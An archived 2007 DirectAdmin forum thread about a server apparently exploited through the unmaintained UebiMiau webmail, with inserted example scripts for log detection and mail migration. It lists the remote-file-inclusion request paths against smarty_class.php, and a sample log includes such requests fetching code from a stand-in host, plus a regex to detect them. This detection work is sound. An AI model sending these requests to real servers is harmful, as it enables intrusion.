Site was exploited due to webmail



ryan1918
05-03-2007, 11:09 PM
fixed the problem

guidob
05-03-2007, 11:33 PM
chmod 000 /var/www/html/webmail

floyd
05-04-2007, 04:40 AM
My website was exploited due to a direct admin, webmail program being installed

That is not very likely. Do you have any proof of this? Any evidence?

nobaloney
05-04-2007, 12:03 PM
ryan1918,

The other webmail program is Uebimiau.

Do you have the most recent version installed?

Jeff

smtalk
05-04-2007, 12:05 PM
jlasman, uebimiau is an outdated application, so it's possible that there are some unfixed security holes (I saw ~3, but not critical).

nobaloney
05-04-2007, 12:09 PM
Is it no longer being worked on? If not, then maybe we will have to warn people to migrate off it.

Does anyone have a script to move uebimiau email folders to imap folders? We may need that.

Jeff

smtalk
05-04-2007, 12:26 PM
It hasn't been updated for ~2 years. Their page isn't working properly; you can't contact the admins, email the authors, etc. A few guys are working on a webmail based on UebiMiau: telaen.org. But I don't think it's a good webmail program at all :)

nobaloney
05-04-2007, 12:45 PM
Thanks for the update on it. I'm going to start thinking about ending support on our systems for uebimiau by the end of this year.

Jeff

RadMan
05-04-2007, 05:12 PM
Thanks for the update on it. I'm going to start thinking about ending support on our systems for uebimiau by the end of this year.

Jeff

Jeff, can you tell me how to SSH to the html file that contains the link to it, so I can kill it?... ;)

Cheers

ryan1918
05-06-2007, 06:56 PM
I was exploited due to this webmail program, or so it seems..

/webmail/smarty/smarty_class.php?_smarty_compile_path= shell
/webmail/smarty/smarty_class.php?filename= shell
/webmail/smarty/smarty_class.php?smarty_dir= shell
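
The three request forms ryan1918 lists are what a probe of the Smarty include looks like in the Apache access log, so the quickest check for whether your own box has been hit is a log search for them. The script below is an added example, not something from this thread or from DirectAdmin; the log lines it runs over are constructed (the addresses 192.0.2.x and 203.0.113.5 are documentation ranges, not real hosts), and the log path, function names and the decision to report only parameter values that are URLs are assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the thread): flag access-log requests that hit the
# UebiMiau Smarty include with one of the parameters named in the post carrying
# a URL as its value (the remote-inclusion pattern), so an admin can see
# whether a box was probed, and from where.

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG="${TMPDIR:-/tmp}/uebimiau_sample_access.log"
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [06/May/2007:18:40:01 +0000] "GET /webmail/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.77 - - [06/May/2007:18:41:12 +0000] "GET /webmail/smarty/smarty_class.php?_smarty_compile_path=http://203.0.113.5/x.txt? HTTP/1.1" 200 301 "-" "libwww-perl/5.805"
192.0.2.10 - - [06/May/2007:18:42:30 +0000] "GET /webmail/inbox.php?folder=inbox HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
192.0.2.77 - - [06/May/2007:18:43:05 +0000] "GET /webmail/smarty/smarty_class.php?smarty_dir=http://203.0.113.5/x.txt? HTTP/1.1" 200 301 "-" "libwww-perl/5.805"
192.0.2.20 - - [06/May/2007:18:44:00 +0000] "GET /webmail/smarty/smarty_class.php?filename=inbox.tpl HTTP/1.1" 200 44 "-" "Mozilla/5.0"
EOF

# Print every request to smarty_class.php whose _smarty_compile_path, filename
# or smarty_dir parameter is a URL (http://, https:// or ftp://, with the colon
# either literal or %3A-encoded).  Local-looking values such as
# filename=inbox.tpl are not reported.
smarty_rfi_hits() {
    grep -E '"(GET|POST) /webmail/smarty/smarty_class\.php\?([^ "]*&)?(_smarty_compile_path|filename|smarty_dir)=(https?|ftp)(%3[Aa]|:)' "$1" || true
}

# Number of such requests: a quick yes/no answer for the log in question.
smarty_rfi_count() {
    smarty_rfi_hits "$1" | grep -c . || true
}

# Distinct client addresses that sent them (what you would block or investigate).
smarty_rfi_sources() {
    smarty_rfi_hits "$1" | awk '{print $1}' | sort -u
}

smarty_rfi_hits "$SAMPLE_LOG"
echo "hits: $(smarty_rfi_count "$SAMPLE_LOG")"
echo "sources: $(smarty_rfi_sources "$SAMPLE_LOG" | tr '\n' ' ')"
```

Point the functions at the real log (for example `smarty_rfi_hits /var/log/httpd/access_log`, or loop over the per-domain logs) rather than the constructed file; a hit with a 200 response is the case worth treating as a possible compromise rather than a failed probe.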

pucky
05-06-2007, 11:48 PM
If Uebimiau is no longer being updated and full of security holes with the ability to exploit, why on earth is DA still installing it on new installations? Surely unsupported applications should no longer be installed, and we should be given the opportunity to remove it from our boxes if we please.

Instead, another application should be installed to replace Uebimiau on new and existing installations.

ryan1918
05-07-2007, 01:08 AM
Well, I guess I got them going now; maybe they will think about removing or showing us how to remove these programs that are WAY outdated or not even being used anymore. I mean, why have an outdated program that risks a server's security? Stop being lazy, remove it from the package, and show everyone how to remove it.

I don't think all these people will like being exploited

pucky
05-07-2007, 01:28 AM
Removing it wouldn't be difficult, but replacing it with something else should be an option. You can remove the option from httpd.conf, but then you have a dead webmail link. Maybe Roundcube should be linked up HINT!

ryan1918
05-11-2007, 11:56 PM
Guess they don't think it's a big issue.

pucky
05-12-2007, 12:14 AM
Maybe they don't, but then again many others don't either; otherwise this thread would be teeming with replies. Oh well, the next few who get hacked may start WWIII. I know, we have already removed it from boxes. When a user clicks on the link, instead of it loading the webmail program it loads an information screen that tells all that we have removed it for security reasons. Maybe others should do the same thing.

If we install RC, you can simply modify httpd.conf to load webmail, which goes to the RC login.

floyd
05-12-2007, 04:42 AM
Removing it wouldn't be difficult, but replacing it with something else should be an option. You can remove the option from httpd.conf, but then you have a dead webmail link. Maybe Roundcube should be linked up HINT!

There are already instructions on how to insert another webmail program for the webmail link in the knowledgebase.

nobaloney
05-12-2007, 07:29 PM
The problem you get when you remove Uebimiau is that people who are using it will lose all their stored email, because Uebimiau uses its own proprietary method for storing mail folders.

The reason Uebimiau was originally chosen for DirectAdmin is that early DA releases didn't have IMAP; they only had POP3 email, and Uebimiau was the best webmail program that worked with POP3.

So it can't just be arbitrarily deleted.

Jeff

pucky
05-15-2007, 08:10 PM
But in today's day and age, as far as control panels are concerned, IMAP is standard, so there should be no reason to have a POP3-style webmail program. I don't know when IMAP became a standard with DA since I wasn't using DA back then, but really, this should be upgraded and archived and replaced. Neomail and Squirrelmail are default installations on every control panel I have used. It should be given some thought by the developers to replace it.

tlchost
05-16-2007, 07:43 AM
But in today's day and age, as far as control panels are concerned, IMAP is standard, so there should be no reason to have a POP3-style webmail program. I don't know when IMAP became a standard with DA since I wasn't using DA back then, but really, this should be upgraded and archived and replaced. Neomail and Squirrelmail are default installations on every control panel I have used. It should be given some thought by the developers to replace it.

Jeff has a good point....there are folks that are using it. Perhaps we should try to reach agreement on a replacement program that could live as webmail, and then instructions could be developed on how to either remove the current webmail, or have it accessible in another way.

The advantage to this approach is that the current uebimiau users aren't sacrificed, and we could have two currently supported webmails.

Thom

pucky
05-16-2007, 08:04 AM
Jeff has a good point....there are folks that are using it.

Yes, but why would you want to keep using something that is no longer supported and could be compromised?

tlchost
05-16-2007, 08:21 AM
Yes, but why would you want to keep using something that is no longer supported and could be compromised?

Oh, one reason might be to allow the current users of the "bad" webmail to transition to the new, improved, and sanctioned one.

I find it easier to attract flies with honey; although one can do it with vinegar, it's just a tad bit harder.

Thom

pucky
05-16-2007, 08:26 AM
If something is exploitable on our boxes we don't want to run it, and I think many feel the same way. In that case, our users don't have any say in the matter. It's called security, and 9 times out of 10 users will appreciate the fact that you are security savvy and care enough to protect them and your own servers. While we don't know the extent of the full attack possible via this email script, because we have not been given all that much detail on the extent of the hack, I sure don't want to put my boxes at risk of getting hacked at the user level and, worse yet, at the server level.

pucky
05-16-2007, 08:30 AM
And just for the record;

UebiMiau HTML Email HTML Injection Vulnerability

UebiMiau is prone to an HTML-injection vulnerability. This issue is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

This issue affects version 2.7.9; other versions may also be vulnerable.

Here is more;
http://www.securityspace.com/smysecure/catid.html?id=16279

And just to let you know, DA runs 2.7.10 and it's also vuln.

tlchost
05-16-2007, 08:42 AM
If something is exploitable on our boxes we don't want to run it, and I think many feel the same way. In that case, our users don't have any say in the matter. It's called security, and 9 times out of 10 users will appreciate the fact that you are security savvy and care enough to protect them and your own servers. While we don't know the extent of the full attack possible via this email script, because we have not been given all that much detail on the extent of the hack, I sure don't want to put my boxes at risk of getting hacked at the user level and, worse yet, at the server level.

OK, I give up....I didn't say that it never should be replaced, I simply agreed with Jeff that one needs to consider dumping the webmail client that is used by many.

I'm surprised that DA would continue to install an unsupported product...even to the extent that it's assigned to the webmail slot, while one that seems to be supported (squirrelmail) is not in the generic position.

Since I'm new to DA, I had to tell my users that theirdomain.com/webmail on the new server was not the same program as theirdomain.com/webmail on the old server.

Thank you for your lecture on security.

Thom

pucky
05-16-2007, 08:45 AM
You're very welcome.

nobaloney
05-16-2007, 06:46 PM
Yes, but why would you want to keep using something that is no longer supported and could be compromised?

Because my users won't like it if their email just disappears.

And in fact, they may even consider me liable. I neither want unhappy clients nor lawsuits.

Do you?

Jeff

floyd
05-17-2007, 04:30 AM
Couldn't we just migrate the UebiMiau mail to Squirrelmail? Doesn't seem like it would be that hard.

tlchost
05-17-2007, 06:30 AM
Couldn't we just migrate the UebiMiau mail to Squirrelmail? Doesn't seem like it would be that hard.

That makes a lot of sense....and if it's done with warning, and some demo screen of squirrelmail, the transition for the users should be trouble-free.

I would think that DA might want to develop/find/offer a way to do it, and thus they would no longer be installing abandonware.

Thom

floyd
05-17-2007, 07:03 AM
I don't think it's hard to do. All the mail for the user's folders for UebiMiau is stored in /var/www/html/webmail/tmp/loginname_localhost/foldername

UebiMiau uses actual folders to store the .eml files. Squirrelmail uses a single file named what they call folders. All you would need to do for each folder is copy all of the .eml files inside a given folder for UebiMiau to the corresponding file for Squirrelmail.

For instance I set up a UebiMiau account and created a folder called Test. Sent myself an email and then copied that email to the folder Test. I then logged in through SSH and appended the contents of the .eml file to the file Test in my home directory which Squirrelmail uses.

I ran this command and it copied all the UebiMiau mail that was in the folder Test to the Squirrelmail folder Test:


cat /var/www/html/webmail/tmp/floyd_localhost/Test/* >> /home/floyd/mail/Test

So we would just need to expand on that and do it for every folder for every login name.

nobaloney
05-17-2007, 12:11 PM
Floyd, your post confused me a bit so I did a bit of checking...

I actually logged on to the system hosting nobaloney.net and used an existing mailuser name (which I've renamed to xxx for the purpose of this discussion).

My system uses Maildir; if you use mbox, your experience may vary, but if you're updating from Uebimiau to Squirrelmail you should probably update to Maildir at the same time anyway.

Note that this still needs a lot more testing before anyone expects it to work without error; that's why I'm NOT creating it as a HowTo.

First, I found the mailusername xxx had a subdirectory at:

/var/www/html/webmail/tmp/xxx_nobaloney.net_localhost/

In that subdirectory I found the following:

[root@da12 xxx_nobaloney.net_localhost]# ls -al
total 40
drwx------ 8 apache apache 4096 Jul 24 2006 .
drwx------ 147 apache apache 12288 Apr 23 09:57 ..
drwx------ 2 apache apache 4096 Jul 24 2006 _attachments
drwx------ 2 apache apache 4096 May 17 11:03 inbox
drwx------ 2 apache apache 4096 Jul 24 2006 _infos
drwx------ 2 apache apache 4096 May 17 11:07 saved-email
drwx------ 2 apache apache 4096 Jul 24 2006 sent
drwx------ 2 apache apache 4096 Jul 24 2006 trash
[root@da12 xxx_nobaloney.net_localhost]#

The contents of _attachments and _infos could conceivably create a problem, especially for attachments; you might want to do some testing to figure out how to move attachments, because attachments in the _attachments directory will certainly not be available for Squirrelmail using IMAP. The _infos directory simply holds the preferences, which will probably be useless in the Squirrelmail environment; don't forget to tell your users to create new preferences in Squirrelmail.

The inbox directory was empty. I don't even know why it exists, or what it's for, since at least in the DirectAdmin implementation, Uebimiau keeps incoming email in the original inbox set up by the system.

The sent directory was also empty, because this particular user doesn't save a copy of sent email. If your users do, you'll have to move the directory contents.

The trash directory was also empty. If I were going to do the conversion I'd (after giving my clients warning) not bother to move the trash directory, which would have the effect of deleting it.

That leaves saved-email, which in the case of this user is a Uebimiau folder which needs to be moved.

Next thing to do is remove the index cache from your IMAP message store for the same mailusername; it'll be rebuilt by IMAP automatically as needed.

# cd /home/nobaloney/imap/nobaloney.net/xxx/Maildir/
# rm -Rf dovecot*

If the IMAP folder of the same name as the Uebimiau folder doesn't exist, create it, with a . prefix as follows:

# mkdir .saved-email
# chmod 770 .saved-email
# chown nobaloney:mail .saved-email

Now create the file structure for the new mail folder:

# cd .saved-email
# mkdir cur new tmp
# chmod 770 cur new tmp
# chown nobaloney:mail cur new tmp

Now move the contents of the Uebimiau folder to the new folder you've just created:

# mv /var/www/html/webmail/tmp/xxx_nobaloney.net_localhost/saved-email/* new/

Then add the new folder name to the subscriptions file. Edit the file at (in my case) /home/nobaloney/imap/nobaloney.net/xxx/Maildir/subscriptions, and add the new folder name on a line of its own. Do not use a leading . character.

Now Squirrelmail should work.

But TEST, TEST, TEST. I make no guarantees and I could have easily left something out :( .

Once you know this works, we'll move further; maybe have someone write a script.

Jeff
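
Jeff ends by asking for someone to script the walk-through once it is known to work. The script below is an added example of that, written for this thread and not taken from it or from DirectAdmin; it turns floyd's "expand on that for every folder" and Jeff's Maildir steps into one function. It assumes the layout both posts describe (a UebiMiau folder is a directory of .eml files under the user's tmp directory; the IMAP side is a Maildir with dot-prefixed subfolders and a subscriptions file), skips the directories Jeff says not to migrate (_attachments, _infos, inbox, trash), and renames each message on the way in because Maildir requires unique filenames. The function names, the optional owner argument, the hostname suffix and the demo tree it builds in a temp directory are all constructed for the example.

```shell
#!/bin/sh
# Added example (not from the thread): script form of the manual steps above.
# Assumes UebiMiau keeps each folder as a directory of .eml files under
# /var/www/html/webmail/tmp/<login>/ and the IMAP side is a Maildir with
# dot-prefixed subfolders and a "subscriptions" file, as the posts describe.

# Folders the walk-through says not to migrate: _attachments and _infos are
# not mail, inbox is already served by the system mailbox, trash is dropped.
SKIP_FOLDERS="_attachments _infos inbox trash"

is_skipped() {
    for s in $SKIP_FOLDERS; do
        [ "$1" = "$s" ] && return 0
    done
    return 1
}

# migrate_uebimiau SRC_DIR MAILDIR [OWNER]
#   SRC_DIR  the user's UebiMiau directory (e.g. .../tmp/xxx_example.com_localhost)
#   MAILDIR  the user's IMAP Maildir (the directory holding cur/new/tmp)
#   OWNER    optional user:group for the new folders (needs root); skipped if empty
migrate_uebimiau() {
    src="$1"; maildir="$2"; owner="${3:-}"
    [ -d "$src" ] && [ -d "$maildir" ] || { echo "bad src or maildir" >&2; return 1; }

    # The IMAP server rebuilds its index cache, so drop the stale one (as above).
    rm -f "$maildir"/dovecot*

    seq=0
    pid=$$
    host=$(hostname 2>/dev/null || echo localhost)
    for dir in "$src"/*/; do
        [ -d "$dir" ] || continue
        folder=$(basename "$dir")
        is_skipped "$folder" && continue

        dest="$maildir/.$folder"
        mkdir -p "$dest/cur" "$dest/new" "$dest/tmp"
        chmod 770 "$dest" "$dest/cur" "$dest/new" "$dest/tmp"
        [ -n "$owner" ] && chown "$owner" "$dest" "$dest/cur" "$dest/new" "$dest/tmp"

        # Maildir needs one file per message with a unique name; the original
        # .eml names can collide across folders, so rename on the way in.
        for eml in "$dir"*.eml; do
            [ -f "$eml" ] || continue
            seq=$((seq + 1))
            mv "$eml" "$dest/new/$(date +%s).${pid}_${seq}.${host}"
        done

        # Subscribe the folder (no leading dot in the subscriptions file).
        touch "$maildir/subscriptions"
        grep -qx "$folder" "$maildir/subscriptions" || echo "$folder" >> "$maildir/subscriptions"
    done
    return 0
}

# count_maildir_new MAILDIR FOLDER -> number of messages landed in .FOLDER/new
count_maildir_new() {
    ls -1 "$1/.$2/new" 2>/dev/null | wc -l | tr -d ' '
}

# Self-contained demo on a constructed tree in a temp directory (not real mail):
# two saved messages, one sent message, one trashed message, an empty _infos.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/src/saved-email" "$DEMO/src/sent" "$DEMO/src/_infos" "$DEMO/src/trash" \
         "$DEMO/Maildir/cur" "$DEMO/Maildir/new" "$DEMO/Maildir/tmp"
printf 'Subject: one\n\nbody\n' > "$DEMO/src/saved-email/1.eml"
printf 'Subject: two\n\nbody\n' > "$DEMO/src/saved-email/2.eml"
printf 'Subject: sent\n\nbody\n' > "$DEMO/src/sent/1.eml"
printf 'Subject: junk\n\nbody\n' > "$DEMO/src/trash/1.eml"
touch "$DEMO/Maildir/dovecot.index"
migrate_uebimiau "$DEMO/src" "$DEMO/Maildir"
echo "saved-email: $(count_maildir_new "$DEMO/Maildir" saved-email) messages"
echo "sent: $(count_maildir_new "$DEMO/Maildir" sent) messages"
```

On a real box the call is `migrate_uebimiau /var/www/html/webmail/tmp/xxx_nobaloney.net_localhost /home/nobaloney/imap/nobaloney.net/xxx/Maildir nobaloney:mail`, repeated for each login directory; messages are moved rather than copied, so the UebiMiau tree is emptied as each folder is migrated, and the _attachments question Jeff raises is left untouched.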

RadMan
06-21-2007, 08:13 AM
Yes, but why would you want to keep using something that is no longer supported and could be compromised?

bumping this up... A couple of on/off checkboxes would solve this prob.

scarecrow
06-21-2007, 08:53 AM
Unless somebody is going to be switching back and forth a lot, I don't see why this needs to be part of any control panel, DA or otherwise. It's a one-time configuration unless something new comes along. A server admin can handle this configuration in a couple of minutes. A control panel is for stuff that needs to be taken care of frequently, not once a year.

tlchost
06-21-2007, 02:17 PM
A control panel is for stuff that needs to be taken care of frequently, not once a year.

A control panel is for stuff that the administrator, or reseller, or end user does not want to do, cannot do, or chooses not to do.

Unlike Lake Wobegon, where the women are all strong, the men good looking and the children are all above average, users of the control panel vary in their abilities.

scarecrow
06-21-2007, 02:50 PM
Well I guess this is starting to be a philosophical debate so this may be my last post on this.

We were talking about, and I was referring to, the changing of the webmail link. This is something only an admin would be able to do, not resellers or users.

A control panel is primarily for users and resellers. A control panel can assist an admin, but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do, then he should probably think twice about being an admin just yet. He should probably spend a few weeks learning to be an admin or hire one. It's not that hard to learn to do the basics. And it pays off in the long run.

Since we were talking about changing the webmail link, out of curiosity I decided to time how long it would take me. From the time I opened my SSH client to the time I exited, it was 50 seconds. I logged in, edited the httpd.conf file, restarted httpd and exited out of SSH, all in 50 seconds. I seriously doubt a control panel can do it much faster than that. Changing the link in the skin would take a little longer, but not much.

There may be other things a control panel would be faster at than what I could do myself but this topic was about changing the webmail link so that is what I was commenting on. I just spent 50 seconds on something that I will not have to change in the foreseeable future. I just cannot justify asking DA to add something that is just going to save me a few seconds over the course of years. I would rather them spend some time on stuff that will help my customers rather than something that will help me. I can take care of the server myself.

tlchost
06-21-2007, 03:21 PM
A control panel is primarily for users and resellers. A control panel can assist an admin but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do then he should probably think twice about being an admin just yet.

And thank you for your philosophy...I don't recall ever seeing that as a written rule. Based on your logic, why even have a Control Panel for the admin? After all, he/she doesn't need one.

I would rather them spend some time on stuff that will help my customers rather than something that will help me.

As I recall, when the thread started a few of us pointed out that the admin should be able to set the available web mail and defaults as a way of helping their customers....

donkeyKICK
08-01-2007, 12:46 AM
I have to agree with tlchost, I am new to this admin thing. I didn't really want it, but in the past I've had trouble with responsiveness of my providers. This way when it needs to be done I can just do it. I am reading threads and such to learn about this product.

I may not be the best admin, but I learn from others, and a control panel feature is far less intimidating than having to work in root. To be honest, root scares me. I just know I'll hose it by some sort of typo, or a lack of understanding about something. In the control panel I can just read the help file, check a box, uncheck the box, etc. Much less permanent. Besides that, in root I might leave a bunch of trash around, not realizing it.

floyd
08-01-2007, 03:19 AM
Based on your logic, why even have a Control Panel for the admin? After all, he/she doesn't need one.

You are correct. I never use the admin level of DA.

floyd
08-01-2007, 03:28 AM
root scares me.

As it should. But driving a car can have much more permanent ramifications, and that doesn't prevent you from driving one. It makes us think about what we are doing. When we first learn to drive a car, most of us don't take it out on the public road first thing. We first practice where nobody will get hurt. We need to do the same thing with a server. Get a cheap old used computer, install Linux on it, install everything else you will need, and practice on it. When you want to do something on your production server, do it on your test server first.

donkeyKICK
08-01-2007, 08:41 AM
Actually, I've just set up a test box, and planned already to practice on that. I have already enlisted a couple of friends who are far more proficient with root to verify that things I plan to do are relatively safe. Kinda like a sanity check before I do something really dumb.

My point is, while many of you don't need a control panel, those of us who have to manage this stuff with little or no experience in 'nux can get a lot more done far more safely with a tool like DA. In fact, I like DA much better than Plesk and cPanel. I like that it doesn't take forever to load, and that most important stuff is already built in. From what I have read so far, it looks like the developers of DA take this forum seriously, and things that can be placed in DA often are if a need presents itself.

To say that "A control panel can assist an admin but if an admin absolutely has to have a control panel then he is not an admin. If a control panel can do something that an admin cannot do then he should probably think twice about being an admin just yet" I think is overly harsh. That was all I was trying to say. There are many reasons an admin might need a cp. Everybody isn't in the same boat as it were.

floyd
08-01-2007, 09:56 AM
My point is just a warning to new admins out there. If you become dependent on a control panel to do your work for you then you are just asking for trouble.

It seems that there are a lot of people out there learning things in reverse. You should first become a decent admin and then use the control panel to assist you.

You can even use the control panel to help you learn as long as when you use it you go check to see what it did.

When you learn how things work, then when a control panel doesn't do something the way you want it to, you can always go and change it yourself instead of begging the writers of the control panel to integrate it.

This has gotten way off topic now so if anybody wants to continue this discussion we should probably make a new thread for it.

donkeyKICK
08-01-2007, 10:17 AM
New to forum protocol also, sorry.

If I wanted to continue this train of thought, but in a new thread how would I?

floyd
08-01-2007, 10:24 AM
From the main page http://www.directadmin.com/forum/index.php click the main subject you think a new thread goes in and then click New Thread.